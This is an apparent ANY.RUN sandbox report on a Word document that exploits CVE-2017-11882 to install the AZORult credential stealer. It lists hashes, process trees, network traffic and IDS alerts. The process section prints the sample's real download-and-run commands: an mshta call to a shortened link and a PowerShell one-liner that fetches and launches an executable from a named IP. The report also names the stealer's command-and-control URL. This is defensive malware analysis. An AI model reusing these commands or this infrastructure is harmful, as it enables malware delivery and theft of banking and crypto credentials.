File name: 9cce4e63d099aff951afab64eb0ff4467538dcbc

Full analysis: https://app.any.run/tasks/0061a1a6-3725-4b15-a11f-18cddc325a65
Verdict: Malicious activity
Threats: AZORult

AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.

Analysis date: July 11, 2019, 13:52:55
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: exploit, CVE-2017-11882, loader, trojan, rat, azorult
Indicators:
MIME: application/octet-stream
File info: data
MD5: 24B66E53A7C7A89D78A7A0B1E6EBAEF5
SHA1: 9CCE4E63D099AFF951AFAB64EB0FF4467538DCBC
SHA256: 60DDBAD70FA21518F7E94473BBC0D3AD25C9931C81294848DD89DBDF75F76803
SSDEEP: 1536:T3z4E334444444ztMfVwX/t/X/D/z/0xdHoP13Gm+xaA2je24roQhK1pFxUw24r2:T3z4E334444444ztMfVwPGT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • d4fg.exe (PID: 2828)
      • smgi.exe (PID: 1884)
      • smgi.exe (PID: 1076)
    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3856)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 1492)
    • Downloads executable files from IP

      • powershell.exe (PID: 1492)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2164)
    • Writes to a start menu file

      • smgi.exe (PID: 1884)
    • Connects to CnC server

      • smgi.exe (PID: 1076)
    • AZORULT was detected

      • smgi.exe (PID: 1076)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1492)
      • d4fg.exe (PID: 2828)
    • Starts Microsoft Office Application

      • rundll32.exe (PID: 3216)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EQNEDT32.EXE (PID: 3856)
    • Creates files in the user directory

      • mshta.exe (PID: 748)
      • powershell.exe (PID: 1492)
      • d4fg.exe (PID: 2828)
      • smgi.exe (PID: 1884)
    • Executed via COM

      • EQNEDT32.EXE (PID: 3856)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 748)
    • Starts itself from another location

      • d4fg.exe (PID: 2828)
    • Application launched itself

      • smgi.exe (PID: 1884)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2296)
    • Application was crashed

      • EQNEDT32.EXE (PID: 3856)
    • Reads internet explorer settings

      • mshta.exe (PID: 748)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2296)
No malware configuration extracted.

All screenshots are available in the full report
Total processes: 50
Monitored processes: 9
Malicious processes: 7
Suspicious processes: 0

Behavior graph (interactive in the full report; process nodes shown): rundll32.exe, winword.exe, eqnedt32.exe, mshta.exe, cmd.exe, powershell.exe, d4fg.exe, smgi.exe, smgi.exe (#AZORULT)

Process information

PID 3216
CMD: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\Desktop\9cce4e63d099aff951afab64eb0ff4467538dcbc
Path: C:\Windows\system32\rundll32.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows host process (Rundll32)
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 2296
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\9cce4e63d099aff951afab64eb0ff4467538dcbc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: rundll32.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID 3856
CMD: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Parent process: svchost.exe
User: admin
Company: Design Science, Inc.
Integrity Level: MEDIUM
Description: Microsoft Equation Editor
Exit code: 0
Version: 00110900

PID 748
CMD: mshta http://bit.ly/2S9sTKU &AAAAAAAAAAAAAAA C
Path: C:\Windows\system32\mshta.exe
Parent process: EQNEDT32.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft (R) HTML Application host
Exit code: 0
Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 2164
CMD: "C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('http://35.225.200.121/BB/2099731','%temp%\d4fg.exe'); Start '%temp%\d4fg.exe'
Path: C:\Windows\System32\cmd.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 1492
CMD: powershell (new-object System.Net.WebClienT).DownloadFile('http://35.225.200.121/BB/2099731','C:\Users\admin\AppData\Local\Temp\d4fg.exe'); Start 'C:\Users\admin\AppData\Local\Temp\d4fg.exe'
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 2828
CMD: "C:\Users\admin\AppData\Local\Temp\d4fg.exe"
Path: C:\Users\admin\AppData\Local\Temp\d4fg.exe
Parent process: powershell.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0

PID 1884
CMD: "C:\Users\admin\AppData\Roaming\suhru\smgi.exe"
Path: C:\Users\admin\AppData\Roaming\suhru\smgi.exe
Parent process: d4fg.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0

PID 1076
CMD: "C:\Users\admin\AppData\Roaming\suhru\smgi.exe"
Path: C:\Users\admin\AppData\Roaming\suhru\smgi.exe
Parent process: smgi.exe
User: admin
Integrity Level: MEDIUM
Total events: 1 748
Read events: 1 209
Write events: 0
Delete events: 0
Modification events: no data
Executable files: 2
Suspicious files: 2
Text files: 5
Unknown types: 4

Dropped files

PID 2296 WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR233.tmp.cvr | type: (none) | MD5: (none) | SHA256: (none)
PID 1492 powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D0JA6LD7P6C5UIHRAZ10.temp | type: (none) | MD5: (none) | SHA256: (none)
PID 2828 d4fg.exe | C:\Users\admin\AppData\Roaming\suhru\smgi.exe:ZoneIdentifier | type: (none) | MD5: (none) | SHA256: (none)
PID 2296 WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | type: pgc | MD5: 2728BD71C2A94A2B2D9046DAE44E4747 | SHA256: 8C7F5686784F258ED2CD2DB26CB8B2EFF892CAEB44930DB54018BBB83B07919A
PID 2296 WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | type: text | MD5: 5D0146C12CE22392FEB423FF2AF0AC40 | SHA256: 290A710871B88B7FCBA40B1A31BEBDCC5C38690974E2BB858A150D771BA799A8
PID 748 mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bit[1].txt | type: text | MD5: 0FB31D7C5F62D7EFBF4AAADA1D92E840 | SHA256: 24BD367284564870F829063D9DD86152B654CE921200A44F92764D865E0BB24E
PID 1492 powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | type: binary | MD5: E4D9C442DD447A8FA05F9CFE88FCBB69 | SHA256: EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036
PID 2828 d4fg.exe | C:\Users\admin\AppData\Roaming\suhru\smgi.exe | type: executable | MD5: 9CCBE739A3F65DB6E52BED66371398F6 | SHA256: 984AF712199589C8AD825C7936E7BC6FEBC25027691EAC4CA497095188105A64
PID 748 mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat | type: dat | MD5: D7A950FEFD60DBAA01DF2D85FEFB3862 | SHA256: 75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
PID 1492 powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFd125f.TMP | type: binary | MD5: E4D9C442DD447A8FA05F9CFE88FCBB69 | SHA256: EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036
HTTP(S) requests: 4
TCP/UDP connections: 4
DNS requests: 3
Threats: 0

HTTP requests

PID 748 mshta.exe | GET 200 | 35.225.200.121:80 | http://35.225.200.121/BB/2099731.hta | CN: US | type: html | size: 1.31 Kb | reputation: suspicious
PID 1492 powershell.exe | GET 200 | 35.225.200.121:80 | http://35.225.200.121/BB/2099731 | CN: US | type: executable | size: 604 Kb | reputation: suspicious
PID 748 mshta.exe | GET 301 | 67.199.248.10:80 | http://bit.ly/2S9sTKU | CN: US | type: html | size: 123 b | reputation: shared
PID 1076 smgi.exe | POST (no HTTP code) | 47.74.46.147:80 | http://niupx.ml/emp22/index.php | CN: JP | type: (none) | size: (none) | reputation: malicious

Connections

PID 748 mshta.exe | 67.199.248.10:80 | domain: bit.ly | ASN: Bitly Inc | CN: US | reputation: shared
PID 1492 powershell.exe | 35.225.200.121:80 | domain: (none) | ASN: (none) | CN: US | reputation: suspicious
PID 1076 smgi.exe | 47.74.46.147:80 | domain: niupx.ml | ASN: Alibaba (China) Technology Co., Ltd. | CN: JP | reputation: suspicious
PID 748 mshta.exe | 35.225.200.121:80 | domain: (none) | ASN: (none) | CN: US | reputation: suspicious

DNS requests

bit.ly | IP: 67.199.248.10, 67.199.248.11 | reputation: shared
niupx.ml | IP: 47.74.46.147 | reputation: malicious

Threats

PID 748 mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
PID 748 mshta.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download
PID 748 mshta.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host HTA Request
PID 748 mshta.exe | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
PID 1492 powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
PID 1492 powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
PID 1492 powershell.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response
PID 748 mshta.exe | Attempted User Privilege Gain | ET WEB_CLIENT GENERIC VB ShellExecute Function Inside of VBSCRIPT tag
(no process) | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .ml Domain
PID 1076 smgi.exe | A Network Trojan was detected | ET TROJAN AZORult Variant.4 Checkin M2
1 ETPRO signature is available in the full report
No debug info